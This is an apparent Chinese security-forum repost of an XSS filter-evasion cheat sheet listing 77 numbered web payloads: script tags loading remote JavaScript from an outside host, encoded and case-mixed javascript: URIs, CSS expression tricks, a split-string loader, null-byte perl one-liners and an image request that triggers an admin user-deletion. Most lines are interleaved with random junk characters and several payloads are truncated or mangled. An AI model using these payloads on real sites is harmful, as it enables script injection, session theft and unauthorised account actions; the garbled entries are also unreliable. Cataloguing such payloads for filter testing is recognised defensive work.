貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 {$ i M5 Z$ T6 Z* \' O' Q, Q9 `9 Y- F/ s/ Z+ H
(1)普通的XSS JavaScript注入2 j) L* J7 p2 ~% j- f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 f) ` `5 I+ A, q- U. E. Y# c/ K
7 E+ N4 T& ]7 e6 `& W6 ?3 O% ` (2)IMG标签XSS使用JavaScript命令& S/ W2 [8 P; u$ S: f6 m, ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, A L, M, J( ^( j+ S3 _. t- F& B
1 H# Y9 p) R% x (3)IMG标签无分号无引号
* m! K# z- e9 {2 q- u0 t <IMG SRC=javascript:alert(‘XSS’)>* S2 \. r$ T9 b5 p
& H0 l/ v/ s6 r& } (4)IMG标签大小写不敏感
& G) a# s8 V4 j% Z) r# h <IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 P- ?4 L. z9 S" h" b
2 \6 I2 r0 w1 p' O- s
(5)HTML编码(必须有分号)1 X( @' z1 m& G* n$ l
<IMG SRC=javascript:alert(“XSS”)>
* G8 k- D p" F# i6 C2 r) @! |7 a0 i, l7 K2 H, C& r% g6 v
(6)修正缺陷IMG标签- M; _3 U' _4 @+ N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> _9 {3 ]6 K7 Z4 l3 T3 I
5 ?9 m2 z* R3 B (7)formCharCode标签(计算器) O/ E: K4 L8 H7 ^5 `6 G
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- j3 F0 l: G* v% D1 |+ p
' p- _7 c6 E1 B# _0 @
(8)UTF-8的Unicode编码(计算器)! d2 v/ @2 s9 o5 g9 c+ `- e) D
<IMG SRC=jav..省略..S')>
* P7 O7 Z- s2 b8 m' ?" Z4 G2 |/ z% a5 d: R
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- S0 l+ j+ B9 ?* c4 ]) P% e
<IMG SRC=jav..省略..S')>1 p' l. \- [3 b; O1 d
& t4 Z; ?7 d8 C
(10)十六进制编码也是没有分号(计算器)
/ _" P! J7 H* f C6 O$ p <IMG SRC=java..省略..XSS')>
* i0 C; c* G# A) H1 [$ p* Z+ I: S& f9 J) @; T3 A
(11)嵌入式标签,将Javascript分开3 h0 P/ W, |8 H$ D
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ O" ]$ O) H& D# \# B) V7 R, y L, v f
$ }/ l: t9 w: b
(12)嵌入式编码标签,将Javascript分开
# A5 S1 C, `, g. y/ d7 s. l <IMG SRC=”jav ascript:alert(‘XSS’);”>8 O2 G: R; t/ h; H# ]# Y5 F6 Q; x
J' I7 N/ m/ Q+ n$ V
(13)嵌入式换行符
. c, g( H! l/ w! ?2 x <IMG SRC=”jav ascript:alert(‘XSS’);”>
* x1 H7 {- \4 d. Q( [8 G% l' [6 ? A1 Z/ H* Q7 Q1 B
(14)嵌入式回车
- t) c/ F" y* U% d O9 w& k <IMG SRC=”jav ascript:alert(‘XSS’);”>
: Y/ i$ n2 {, L5 E0 A" }6 [
' ]. B$ B3 Y: f M( x* A$ S (15)嵌入式多行注入JavaScript,这是XSS极端的例子
8 {9 V. L+ n. g0 x <IMG SRC=”javascript:alert(‘XSS‘)”>7 g# Y; j8 S3 l3 }
2 ^" K8 d# f6 W4 h( [( P (16)解决限制字符(要求同页面)% }& Y6 I+ |, q |
<script>z=’document.’</script>5 J4 r1 z. q1 a8 w% S
<script>z=z+’write(“‘</script>
( J2 l7 J0 j5 L( v$ J <script>z=z+’<script’</script>$ @" Y# `% M" r' r
<script>z=z+’ src=ht’</script>
( ~, b/ e3 Q' K <script>z=z+’tp://ww’</script>
( N% e/ b5 S) f, m+ _: t! c( l <script>z=z+’w.shell’</script>/ M4 A2 S7 v: L* r
<script>z=z+’.net/1.’</script>
0 `( I+ \9 g4 Z' B <script>z=z+’js></sc’</script>9 B2 W1 k; F9 m# T* i
<script>z=z+’ript>”)’</script>
( M9 V& }- p2 J4 c5 a <script>eval_r(z)</script>' j! |4 I* E M" K9 `, R8 w& X
- e I3 I, A8 _8 Y
(17)空字符
8 B, w, k" ^( f" s3 c% D" q& i* Y perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 i- |" r# v0 T% | a
3 ?' G4 I' Y1 k, P0 ^ o" b- W (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: r& @3 m7 z7 W# P8 m6 M7 X" S a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& p& X4 t. J1 o
4 U1 O" z6 `# F0 T5 X
(19)Spaces和meta前的IMG标签
$ Q. h' c3 T" n$ i3 ?/ I- k( v: h <IMG SRC=” � javascript:alert(‘XSS’);”>! g! I' P1 b! b: F0 r1 m7 ~/ X
- W7 U7 K2 R; T/ n* a, X3 }( g (20)Non-alpha-non-digit XSS
1 E; ]! ]$ K3 s6 B. t <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% L+ n7 b h9 `; u" S5 Q+ V
/ h* L3 N% u1 r (21)Non-alpha-non-digit XSS to 2; S# T1 d4 b6 a1 q
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>" Z! G( V6 U) Q7 \* u
% U( w: j4 O+ Z& n0 V8 i3 G" [8 t# {1 C
(22)Non-alpha-non-digit XSS to 3
1 m0 j) j& @% R1 W- q <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' m! C/ w& l; }# V" ]# z
8 y$ x, A/ f# n* b, A. o0 C
(23)双开括号7 ]& `& e% e) R5 w% l- u6 V% @
<<SCRIPT>alert(“XSS”);//<</SCRIPT>5 C; v1 ^$ z, P: T3 D, o& U
6 B" M2 d- W" c- `3 l( E8 y& U (24)无结束脚本标记(仅火狐等浏览器)
. U" s9 e+ V4 s <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( Y% ]0 t* s* N; p4 Q1 i
2 F& Z4 \8 R. s1 q% X/ v
(25)无结束脚本标记2
% a$ a, u5 j1 i" z/ i/ m <SCRIPT SRC=//3w.org/XSS/xss.js>
7 a" m6 ]# a2 e) R1 M. h: P
, H# F* ^3 w: Y! {3 \) Y9 y [1 Z7 u (26)半开的HTML/JavaScript XSS
& s" a& O' u6 X! ? r& \4 |/ _ <IMG SRC=”javascript:alert(‘XSS’)”
9 F( {& |8 |! N- C5 B% J5 A# f3 l$ O
(27)双开角括号* y* E A! p( L" _- v
<iframe src=http://3w.org/XSS.html <8 \9 r8 k, V/ F5 F: }/ y
) @! T; V* D& ?! i* e (28)无单引号 双引号 分号
s/ {9 x5 }0 c* d' M5 Y <SCRIPT>a=/XSS/
% X/ l$ p$ i# u9 p- Y alert(a.source)</SCRIPT> s: U5 _) T, ]5 ^" v, U Z
. \8 O t" t" s+ w1 G
(29)换码过滤的JavaScript
2 V7 {/ u" A' `# L; ^$ N% K6 F S2 Z \”;alert(‘XSS’);//* H" W+ q' S/ `3 c- U9 k5 D
% N* `/ Z, l( _4 D( p- F
(30)结束Title标签
5 U' ]3 E' B" R- \/ K: u </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% r4 a4 l7 d9 ]9 f3 Z& @
$ f- \" ~; _4 P2 K) p
(31)Input Image
! |( e/ r n! z <INPUT SRC=”javascript:alert(‘XSS’);”>+ l, F* y+ U8 ^* s3 V ]
) _- x6 o. m7 x: U: q6 o (32)BODY Image
4 S# u2 m9 @8 l5 y: l: |4 d5 [0 J- P <BODY BACKGROUND=”javascript:alert(‘XSS’)”>" _: M7 v, {* y1 R1 ^/ Z6 C
6 ~6 U+ U. ]8 C0 o4 [) S (33)BODY标签
( @& o3 G4 e# C3 t8 X) S* B <BODY(‘XSS’)>
$ z- `' \0 B" X3 ~0 ]- H# ]' K1 c4 Q# R; |$ Y- h6 T; I
(34)IMG Dynsrc
' l: u$ m' w) x <IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 l2 q0 \$ ~( H5 B, F" Z; \, E3 t4 f0 K, h+ X
(35)IMG Lowsrc
" w: m1 ]" z: j6 X7 i$ |' u+ u <IMG LOWSRC=”javascript:alert(‘XSS’)”>
; T |3 d' k& g8 g5 y
7 h% w; E; c) m( p (36)BGSOUND
7 L" ~7 o5 q1 a- b9 H: \! q <BGSOUND SRC=”javascript:alert(‘XSS’);”>8 q( y) ?5 W/ ~0 }, r4 [; d) g
4 V( ~" T6 Y& U3 x (37)STYLE sheet; ^$ w8 C3 V o( @, v
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 q% e" H; i3 z0 O
# ]1 c7 T: q6 l- a( h$ e$ _, P
(38)远程样式表! s' l, H9 h* `' K. R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- f6 l' T# A. i, T; o: H
* N P7 z: \( ~' ~
(39)List-style-image(列表式)# a' |/ V! w6 j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" \/ _- w1 G: ^
' \0 \7 J6 v/ |- w" f* N, z2 t (40)IMG VBscript
' ?; |) T8 ~: I/ v3 i& v+ u <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS0 q d1 L/ i# w5 z$ S: p: M( i
) a+ q! w4 v7 m; t& b7 D
(41)META链接url
, S8 j' S: |1 B) T4 s) x <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' q5 R4 t1 Q& h
, t7 h! E; i3 X% z+ { (42)Iframe
" l* L9 h" \9 D. q1 |2 C( t <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ E6 g9 u1 Z# u" G1 R
% Y- V& s }% E6 j4 c2 k2 X1 k' H& j (43)Frame
; Q9 i4 F4 l& \# i5 D7 D <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
8 b& t. v1 U4 O" t
^" R! Q. t! x0 p( e4 e+ { (44)Table
3 B! X4 j4 i1 v+ t) k1 A M' m <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 O2 q- a6 Q1 a+ C( P$ D, l; D; x9 j! ]! N& V
(45)TD
9 |( X' @1 Z& X" p8 m <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
c1 h4 _# M5 ^' l# [1 g7 ?; q
. \" B6 o* H" C2 N (46)DIV background-image
& j% p8 i4 f; w' H- a5 e <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, p& E. g2 L; _
3 ~) d; m- P! a4 _# {1 b
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 k' [7 f( W, Z4 t
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>7 p1 d) o. U. p( z! i
7 S* [+ t! h% |/ S$ e
(48)DIV expression7 P$ h# |( `+ K( u5 F
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ D2 U. R% z+ \8 w. r( W0 a
2 }* I% r$ w k# E6 S- e (49)STYLE属性分拆表达5 Y/ r7 V) b2 I% T. J( j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* t. ?# h0 \- c& Y- ~1 O
9 |" r9 R2 V. f8 m, S5 u (50)匿名STYLE(组成:开角号和一个字母开头)
0 l4 Y6 o0 g, A6 T <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) I2 ^& @+ A) q1 A$ ^
2 a- q* R; O- j7 `% L, g* i (51)STYLE background-image+ [$ P6 Q& s: m! _
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
6 y8 h* O* l& U0 I
! A0 D9 L ]* L% l, b' F6 \ (52)IMG STYLE方式
' X, ?5 G% O: }7 q9 ~ exppression(alert(“XSS”))’>! D% _% V7 s- K" C! \# x$ F/ k8 W
1 Z& M) M) Q, H1 e) N( ]. C* N; q: C5 I (53)STYLE background: h9 Y# L0 y( P5 A" g" m
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
I5 U6 V4 l! j; V
' S/ ^2 N& H Z3 c (54)BASE. z" t7 ^2 h* M3 @
<BASE HREF=”javascript:alert(‘XSS’);//”>9 V7 ^( ~ a, V4 x9 o
9 @* \# S4 d( t: v |2 j$ z (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
; R; j( h/ v9 [- U+ g0 E5 b4 c <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 L$ a" P8 U$ @. a" u2 g. y+ r7 B7 b* a" a( K3 E* p
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ O2 M6 I% c1 @7 l( q7 T a=”get”;- T3 I5 E) W' i4 i7 r% o
b=”URL(\”";, L& y u; O$ m# J/ L& p
c=”javascript:”;2 L; d' G2 l) p2 j; S
d=”alert(‘XSS’);\”)”; D/ E1 U( I# N2 z* ?
eval_r(a+b+c+d);
4 t" @3 ~ {( c
( R" F' @5 [5 x; D (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% p% R4 B2 y) i) a7 ?5 b) u0 \5 K <HTML xmlns:xss>& c4 L( ]5 \/ t
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% d. i: W. \( @: E7 X; N
<xss:xss>XSS</xss:xss>
' J0 t( }2 j0 w3 k2 a </HTML>
& l/ J- U4 Z3 P9 @6 m9 q4 N0 _7 N8 p- P, `4 h( f! M, ?
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用2 L3 }4 K" f/ W. y- X
<SCRIPT SRC=””></SCRIPT>; ~% I. j8 Q* B3 l' R& F+ d
+ X& l l" ?) q2 s; E (59)IMG嵌入式命令,可执行任意命令( q4 p1 u. v: Q7 M0 ~8 t- `2 i( G! p
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# }5 V$ g) v( A7 p& g* W8 Z c% ?: l; {+ b3 M7 A, i
(60)IMG嵌入式命令(a.jpg在同服务器)
& L7 e0 Q8 I" \3 p& P+ o J1 O Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ z9 \, `- p: K% d0 [: Y
9 I- `; h7 Z" R2 I. m5 R
(61)绕符号过滤+ ]5 P/ f0 [/ f! v* G2 f B# k" z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, C3 |* D2 Z) o4 Z: N8 I
, e6 Y. s9 g6 x" t9 k' F+ L (62)
! }* A( q% |9 @* u <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
} x9 t' d8 s( V( I
+ p% g! ^0 f | (63)/ S) O- J! T, ^/ e
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 g; D m5 `' w. ]% P( c, p
# t O, D" s# r, u- y) Q (64)
$ |# U6 m. A9 ~9 U. i <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
6 G, i, @, n6 u, c& _8 V" k0 ?% K& G( G, x& y( y
(65); n! b R) ?3 ~3 o) S' H- e
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
$ H1 Z1 F8 k% {$ z4 P* N
+ @: {+ X- C! T: { (66)
, ^3 G/ A9 W: u6 ?: m4 S' M+ a, ? <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>: ]2 F/ S3 H8 h B. `3 @) \/ t
# c2 ~6 ?8 s2 q) ]. F (67); a5 O' `" P8 C( } p
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
% C( a4 \- @+ C- T% g) j' \/ y d, ^0 `0 t. q& E$ e
(68)URL绕行, z3 X3 t6 {7 t0 v, o/ l2 A/ q2 X9 `" M: u
<A HREF=”http://127.0.0.1/”>XSS</A> Q( f: {! e* d) i$ Q* s
# h; Y- T6 R" N% Z4 [
(69)URL编码
# l( A7 D" s$ J; I! }3 C <A HREF=”http://3w.org”>XSS</A>
) l% d+ u' Z: F' Z) J Y
& X! v7 l b- S; z5 }2 t% X7 \# x/ A, Z (70)IP十进制
5 a, t6 o& s. Q% @1 I. d <A HREF=”http://3232235521″>XSS</A> q5 g7 x0 `/ W+ l: w3 r
$ L( I$ S. A5 ]+ f" n% [' M2 z4 \+ N (71)IP十六进制
- F) C N2 `6 z2 I4 e7 P <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% o& t: b- K7 d8 ]
9 A+ W f& X, F (72)IP八进制& ~& M# Q. C' p+ ]. i
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; B1 D. f8 R) Y, Q* A# ?4 U$ q3 b; d+ D7 n- v6 t% v
(73)混合编码" ]- }1 [# P9 j# O, x
<A HREF=”h
- l3 o/ k% J2 z; N) X tt p://6 6.000146.0×7.147/”">XSS</A>
6 G$ p: ^& N V2 e" U- d. J) s/ ^4 Y( o5 ]; N4 h4 v" f
(74)节省[http:]
" z0 P0 d: [; M, R3 o' q <A HREF=”//www.google.com/”>XSS</A>
# i; ?/ C$ R) ~$ q5 q3 |5 f: l( x) Z3 l, F
(75)节省[www]
4 F, l+ T) D s1 Z <A HREF=”http://google.com/”>XSS</A>
, X1 i& P+ g9 F/ M G n% @" V( ~" ?* \
(76)绝对点绝对DNS
9 _- b/ e; b! ^+ q& X5 m <A HREF=”http://www.google.com./”>XSS</A>
" ]+ P, d$ }' j8 H
5 p2 A$ Z4 I# b5 D x4 C (77)javascript链接# `) F- y, l2 p0 b
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对